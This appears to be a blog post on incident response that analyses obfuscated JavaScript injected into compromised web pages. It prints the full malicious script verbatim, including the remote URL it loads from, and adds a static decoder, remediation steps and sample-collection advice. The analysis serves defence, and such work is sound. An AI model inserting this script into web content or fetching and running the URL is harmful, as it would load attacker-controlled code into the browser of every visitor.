JavaScript Added To Web Pages

I was asked to look into web pages which had the following code appended to them:

<script>var t="";var h="";var G;if(G!='m'){G=''};var D_="";function C() {var S='';var J="";var K=window;var V;if(V!='O'){V=''};var R=String("scri"+"pt");var iq="";var Z;var r='';var A;if(A!=''){A='zH'};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!='' && f!='Qp'){f=null};var z=RegExp;var GU;if(GU!='I' && GU!='lb'){GU=''};this.JL="";var bT;if(bT!=''){bT='px'};function N(q,p){var d="[";var nm;if(nm!='il' && nm != ''){nm=null};d+=p;d+=b;var oF;if(oF!='So' && oF != ''){oF=null};var w=new z(d, E);this.ze='';return q.replace(w, r);};var wk;if(wk!='e'){wk=''};this.Ns='';var i="onl"+"oad";var dz;if(dz!='no'){dz='no'};this.wa='';var LO='';var O_='';var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";this.g='';this.Vw='';Z=function(){this.ZF='';try {var Gf;if(Gf!='uW' && Gf != ''){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!='' && Yo!='fF'){Yo='ib'};var v=new Array();n[D]=[1,8][0];var gY='';var gYj='';n[u] = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');var XG;if(XG!='' && XG!='vi'){XG=null};var II='';var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!='' && QA!='wq'){QA='JJ'};var Oa;if(Oa!='' && Oa!='hH'){Oa='Od'};var yK=new String();var Zy;if(Zy!='' && Zy!='MB'){Zy=null};var uu;if(uu!='' && uu!='nE'){uu=null};document[Q][L](n);var fR;if(fR!='U' && fR != ''){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM='';};K[i]=Z;var vr="";this.kR='';var Jf;if(Jf!='of' && Jf != ''){Jf=null};};var Wd=new Array();var UK;if(UK!='HZ' && UK!='uz'){UK=''};C();var KqP=new String();</script>

On its face, this is an unauthorized change; treat it as a compromise and kick in your incident response procedure. Roll the change back from a known-good copy of the site (the same script is usually appended to many files, so check every page, not just the one that was reported). Learn how the unauthorized change occurred: suspect configuration errors, suspect vulnerable code, rebuild using updated software, and change any passwords or keys that can write to the web root. Make sure it doesn't happen again.

It may prove important to know what the code does. Feed that code into jsbeautifier, jsunpack or wepawet, or decode it by hand: every string the script needs is hidden by padding it with junk characters that a small helper strips out again with a regular expression. Once decoded, the script installs a window.onload handler that creates a <script> element, sets its src to the URL below and appends it to the document body, so the remote code runs in the browser of everyone who views the page:

http://pokesack.ru:8080/google.com/technorati.com/iciba.com.php
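The decoding can be done statically, without ever running the malware. The following is an added example, not code from the original post: it re-implements the injected script's string-stripping helper (called N there; stripChars here is my name for it) and runs it over the padded string fragments copied verbatim from the script above, recovering both the URL and the DOM property names the script uses.

```javascript
// Added example (not part of the original post): a static decoder for the
// string-hiding trick used by the injected script. Its helper N(q, p) builds
// the regular expression /[p]/g and deletes every matching character from q,
// i.e. each real string is simply padded with junk characters that the key
// then removes.
function stripChars(text, junk) {
  // Escape characters that are special inside a regex character class.
  // The samples above never use them, but a variant of the script could.
  const cls = junk.replace(/[\]\\^-]/g, "\\$&");
  return text.replace(new RegExp("[" + cls + "]", "g"), "");
}

// Arguments copied verbatim from the script above: [padded text, junk key].
const URL_PARTS = [
  ["hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j", "GYjQWH"],
  ["8295634772434270642295791948166996914660733561217215135", "65174293"],
  ["/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5",
   "I36Xj9VE4W5RDLM"],
];

// Recover the src= value assigned to the injected <script> element.
function decodeInjectedUrl() {
  return URL_PARTS.map(([text, junk]) => stripChars(text, junk)).join("");
}

// The DOM names are hidden the same way, or by taking a prefix of a padded
// literal with substr(). Decoding them shows what the script does with the
// URL: on window.onload, document.body.appendChild(<script defer src=URL>).
function decodeDomNames() {
  return {
    event: "onl" + "oad",
    element: "scri" + "pt",
    srcAttr: stripChars("sqr4cp", "5pqQ4xa7"),
    deferAttr: "defeANm0".slice(0, 4) + "r",
    method: "appmnQi".slice(0, 3) + "end" + "Chinrc7".slice(0, 3) + "ldxiDU".slice(0, 2),
    target: "bodyOc6".slice(0, 4),
  };
}

// Stand-alone run: print the decoded indicator and the DOM calls it drives.
console.log(decodeInjectedUrl());
console.log(decodeDomNames());
```

Decoding statically like this also yields a clean indicator (the full URL) for searching server logs and other sites, which is safer than letting the script run in a browser to see where it goes.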

It may prove important to know what happens when that URL is fetched. Don't expect to give a definitive judgement: the code behind the link can be changed frequently, and servers like this commonly return different content depending on the visitor's User-Agent, Referer or IP address, or nothing at all on a repeat visit. You can still use wget or curl to collect a sample of the page, ideally from an isolated machine, saving the response to disk rather than opening it in a browser.
